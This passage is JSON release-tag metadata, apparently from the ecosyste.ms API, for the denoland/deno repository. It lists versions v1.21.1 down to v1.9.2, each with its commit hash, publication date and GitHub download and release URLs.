s_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9